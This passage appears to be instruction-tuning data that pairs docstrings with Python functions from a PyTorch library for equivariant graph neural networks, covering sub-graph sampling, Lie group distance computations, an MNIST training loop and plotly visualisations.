torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_vertex_index.pt")) + self.edge_index = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_index.pt")) + self.edge_sqdist = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_sqdist.pt")) + self.edge_weight = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_weight.pt")) + for vertex_attr in self.vertex_attributes: + setattr(self, vertex_attr, torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_{vertex_attr}.pt"))) +[INST] Reinitialize random sub-graph vertices and edges' attributes.. [/INST] def reinit(self): + print("Reinit graph...") + if hasattr(self, "laplacian"): + del self.laplacian + self.vertex_index = self.graph.vertex_index.clone() + self.sub_vertex_index = self.vertex_index.clone() + for attr in self.graph.vertex_attributes: + setattr(self, attr, getattr(self.graph, attr)) + self.edge_index = self.graph.edge_index.clone() + self.edge_weight = self.graph.edge_weight.clone() + self.edge_sqdist = self.graph.edge_sqdist.clone() + print("Done!") +[INST] Randomly samples a given rate of edges from the original graph to generate a random sub-graph. +The graph is assumed to be undirected and the probability for an edge to be sampled is proportional +to its weight.. [/INST] def edges_sampling(self, rate): + print("Sample edges...") + mask = self.graph.edge_index[0] < self.graph.edge_index[1] + edge_index = self.graph.edge_index[..., mask] + edge_weight = self.graph.edge_weight[mask] + edge_sqdist = self.graph.edge_sqdist[mask] + num_samples = math.ceil(rate * edge_weight.nelement()) + sampled_edges = torch.multinomial(edge_weight, num_samples) + sampled_edge_index = edge_index[..., sampled_edges] + sampled_edge_weight = edge_weight[sampled_edges] + sampled_edge_sqdist = edge_sqdist[sampled_edges] + self.edge_index = torch.cat((sampled_edge_index.flip(0), sampled_edge_index), 1) + self.edge_weight = sampled_edge_weight.repeat(2) + self.edge_sqdist = sampled_edge_sqdist.repeat(2) + print("Done!") +[INST] Randomly samples a given rate of vertices from the original graph to generate a random subgraph. +All the vertices have the same probability being sampled and at the end of the algorithm, it only remains +edges between sampled vertices. + +vertices' sampling is not compatible with pooling and unpooling operations for now. [/INST] def vertices_sampling(self, rate): + print("Sample vertices...") + num_samples = math.floor(rate * self.graph.num_vertices) + sampled_vertices, _ = torch.multinomial(torch.ones(self.graph.num_vertices), num_samples).sort() + self.vertex_index = torch.arange(num_samples) + self.sub_vertex_index = sampled_vertices.clone() + for attr in self.graph.vertex_attributes: + setattr(self, attr, getattr(self.graph, attr)[sampled_vertices]) + vertex_mapping = torch.empty(self.graph.num_vertices, dtype=torch.long).fill_(-1) + vertex_mapping[self.graph.vertex_index[sampled_vertices]] = self.vertex_index + edge_index = vertex_mapping[self.graph.edge_index] + mask = (edge_index[0] >= 0) & (edge_index[1] >= 0) + self.edge_index = edge_index[:, mask] + self.edge_weight = self.graph.edge_weight[mask] + self.edge_sqdist = self.graph.edge_sqdist[mask] + print("Done!") +[INST] Returns the cartesian position of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + x, y, z = self.graph.cartesian_pos() + if axis == "x": + return x[self.sub_vertex_index] + if axis == "y": + return y[self.sub_vertex_index] + if axis == "z": + return z[self.sub_vertex_index] + return x[self.sub_vertex_index], y[self.sub_vertex_index], z[self.sub_vertex_index] +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return self.graph.vertex_attributes +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return se2_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_x, self.vertex_y, self.vertex_theta +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return se2_matrix(self.vertex_x, self.vertex_y, self.vertex_theta) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["x", "y", "theta"] +[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + if axis is None: + return self.vertex_x, self.vertex_y, self.vertex_theta + if axis == "x": + return self.vertex_x + if axis == "y": + return self.vertex_y + if axis == "z": + return self.vertex_theta +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_x", "vertex_y", "vertex_theta") +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return r2_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_x, self.vertex_y +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return r2_matrix(self.vertex_x, self.vertex_y) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["x", "y"] +[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + if axis is None: + return self.vertex_x, self.vertex_y, torch.zeros(self.num_vertices) + if axis == "x": + return self.vertex_x + if axis == "y": + return self.vertex_y + if axis == "z": + return torch.zeros(self.num_vertices) +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_x", "vertex_y") +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return so3_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_alpha, self.vertex_beta, self.vertex_gamma +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return so3_matrix(self.vertex_alpha, self.vertex_beta, self.vertex_gamma) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["alpha", "beta", "gamma"] +[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + if not axis is None: + return (2 * math.pi + self.vertex_alpha) * betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis) + x, y, z = betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis) + x *= 2 * math.pi + self.vertex_alpha + y *= 2 * math.pi + self.vertex_alpha + z *= 2 * math.pi + self.vertex_alpha + return x, y, z +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_alpha", "vertex_beta", "vertex_gamma") +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return s2_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_beta, self.vertex_gamma +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return s2_matrix(self.vertex_beta, self.vertex_gamma) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["beta", "gamma"] +[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + return betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis) +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_beta", "vertex_gamma") +[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing +R(2) group elements.. [/INST] def r2_matrix(x, y, device=None): + G = torch.zeros((x.nelement(), 3, 3), device=device) + G[..., 0, 2] = x + G[..., 1, 2] = y + G[..., 0, 0] = 1.0 + G[..., 1, 1] = 1.0 + G[..., 2, 2] = 1.0 + return G +[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing +SE(2) group elements.. [/INST] def se2_matrix(x, y, theta, device=None): + G = rotation_matrix(theta, "z", device=device) + G[:, 0, 2] = x + G[:, 1, 2] = y + return G +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def r2_inverse(G): + return torch.inverse(G) +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def se2_inverse(G): + return torch.inverse(G) +[INST] Returns three new tensors corresponding to x, y and theta attributes of the group elements specified by the +se2 group elements in matrix formulation.. [/INST] def se2_element(G): + return G[..., 0, 2], G[..., 1, 2], torch.atan2(G[..., 1, 0], G[..., 0, 0]) +[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def r2_log(G): + x, y = r2_element(G) + c1 = x + c2 = y + c3 = torch.zeros_like(c1) + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def se2_log(G): + x, y, theta = se2_element(G) + c1 = theta / 2 * (y + x * torch.cos(theta / 2) / torch.sin(theta / 2)) + c2 = -theta / 2 * (x + y * torch.cos(theta / 2) / torch.sin(theta / 2)) + c3 = theta.clone() + mask = theta == 0.0 + c1[mask] = x[mask] + c2[mask] = y[mask] + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Return the squared riemannian distances between group elements in matrix formulation.. [/INST] def r2_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(r2_inverse(Gg), Gh) + return weighted_norm(r2_log(G), Re) +[INST] Returns the squared riemannian distances between group elements in matrix formulation.. [/INST] def se2_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(se2_inverse(Gg), Gh) + x, y, theta = se2_element(G) + sqdist1 = weighted_norm(se2_log(se2_matrix(x, y, theta)), Re) + sqdist2 = weighted_norm(se2_log(se2_matrix(x, y, theta - math.pi)), Re) + sqdist3 = weighted_norm(se2_log(se2_matrix(x, y, theta + math.pi)), Re) + sqdist, _ = torch.stack((sqdist1, sqdist2, sqdist3)).min(dim=0) + return sqdist +[INST] Trains a model on MNIST and evaluates its performance on MNIST, Flip-MNIST and 90Rot-MNIST.. [/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "mnist"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.anisotropic: + graph = SE2GEGraph( + [28, 28, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi), + path_to_graph=args.path_to_graph, + ) + else: + graph = R2GEGraph( + [28, 28, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi), + path_to_graph=args.path_to_graph, + ) + sub_graph = RandomSubGraph(graph) + model = WideResSE2GEChebNet( + in_channels=1, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=sub_graph, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "mnist", + num_layers=config.ntheta, + batch_size=args.batch_size, + val_ratio=0.0, + path_to_data=args.path_to_data, + ) + (classic_test_loader, rotated_test_loader, flipped_test_loader,) = get_equiv_test_loaders( + "mnist", num_layers=config.ntheta, batch_size=args.batch_size, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=sub_graph, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + classic_metrics = {"classic_test_accuracy": Accuracy(), "classic_test_loss": Loss(nll_loss)} + rotated_metrics = {"rotated_test_accuracy": Accuracy(), "rotated_test_loss": Loss(nll_loss)} + flipped_metrics = {"flipped_test_accuracy": Accuracy(), "flipped_test_loss": Loss(nll_loss)} + classic_evaluator = create_supervised_evaluator( + graph=sub_graph, + model=model, + metrics=classic_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(classic_evaluator) + rotated_evaluator = create_supervised_evaluator( + graph=sub_graph, + model=model, + metrics=rotated_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(rotated_evaluator) + flipped_evaluator = create_supervised_evaluator( + graph=sub_graph, + model=model, + metrics=flipped_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(flipped_evaluator) + if args.sample_edges or args.sample_vertices: + trainer.add_event_handler( + Events.ITERATION_STARTED, + sub_graph.reinit, + ) + trainer.add_event_handler( + Events.EPOCH_COMPLETED, + sub_graph.reinit, + ) + if args.sample_vertices: + trainer.add_event_handler( + Events.ITERATION_STARTED, + sub_graph.vertices_sampling, + args.vertices_rate, + ) + if args.sample_edges: + trainer.add_event_handler( + Events.ITERATION_STARTED, + sub_graph.edges_sampling, + args.edges_rate, + ) + if args.save_models: + gst = lambda *_: trainer.state.epoch + handler = Checkpoint( + {"model": model}, DiskSaver(args.path_to_model, create_dir=True), n_saved=5, global_step_transform=gst + ) + trainer.add_event_handler(Events.EPOCH_COMPLETED, handler) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, classic_evaluator, classic_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, rotated_evaluator, rotated_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, flipped_evaluator, flipped_test_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Visualize graph's vertices.. [/INST] def visualize_graph(graph): + df = pd.DataFrame({"vertex_index": graph.vertex_index}) + df["X"], df["Y"], df["Z"] = graph.cartesian_pos() + for attr in graph.vertex_attributes: + df[attr] = getattr(graph, attr) + fig = px.scatter_3d(df, x="X", y="Y", z="Z", hover_data=list(graph.vertex_attributes) + ["vertex_index"]) + fig.update_traces( + marker={"size": 5, "color": "crimson", "line": {"width": 2, "color": "DarkSlateGrey"}, "opacity": 1.0}, + ) + fig.update_layout(width=500, height=500, margin={"l": 0, "r": 0, "t": 0, "b": 0}) + fig.show() +[INST] Visualize a signal on the graph's vertices.. [/INST] def visualize_graph_signal(graph, signal): + df = pd.DataFrame({"vertex_index": graph.vertex_index}) + df["X"], df["Y"], df["Z"] = graph.cartesian_pos() + df["signal"] = signal + for attr in graph.vertex_attributes: + df[attr] = getattr(graph, attr) + fig = px.scatter_3d( + df, + x="X", + y="Y", + z="Z", + color="signal", + hover_data=list(graph.vertex_attributes) + ["signal", "vertex_index"], + color_continuous_scale="PiYG", + color_continuous_midpoint=0.0, + ) + fig.update_traces( + marker={"size": 5, "opacity": 1.0}, + ) + fig.update_layout( + width=600, + height=500, + margin=dict(l=0, r=0, t=0, b=50), + ) + fig.show() +[INST] Visualize graph neighborhood of the given vertex.. [/INST] def visualize_graph_neighborhood(graph, vertex_index): + df1 = pd.DataFrame() + df1["vertex_index"], df1["weight"], df1["sqdist"] = graph.neighborhood(vertex_index) + df2 = pd.DataFrame({"vertex_index": graph.vertex_index}) + df2["X"], df2["Y"], df2["Z"] = graph.cartesian_pos() + for attr in graph.vertex_attributes: + df2[attr] = getattr(graph, attr) + df = pd.merge(df1, df2, on="vertex_index", how="right") + df.weight.fillna(0.0, inplace=True) + fig = px.scatter_3d( + df, + x="X", + y="Y", + z="Z", + color="weight", + hover_data=list(graph.vertex_attributes) + ["weight", "sqdist", "vertex_index"], + color_continuous_scale="PuRd", + range_color=[0, 1], + ) + fig.update_traces( + marker={"size": 5, "opacity": 1.0}, + ) + fig.update_layout(width=600, height=500, margin={"l": 0, "r": 0, "t": 0, "b": 0}) + fig.show() +[INST] Returns a new tensor whose elements corresepond to the modulo with offset of the elements of the input.. [/INST] def mod(input, n, d=0.0): + return (input - d) % n + d +[INST] Returns a new tensor whose elements correspond to the sinus cardinal of the elements of the input.. [/INST] def sinc(input): + output = torch.sin(input) / input + output[input == 0.0] = 1.0 + return output +[INST] Returns a new tensor with the rounded to n decimal places version of the elements of the input.. [/INST] def round(input, n_digits=0): + return torch.round(input * 10 ** n_digits) / (10 ** n_digits)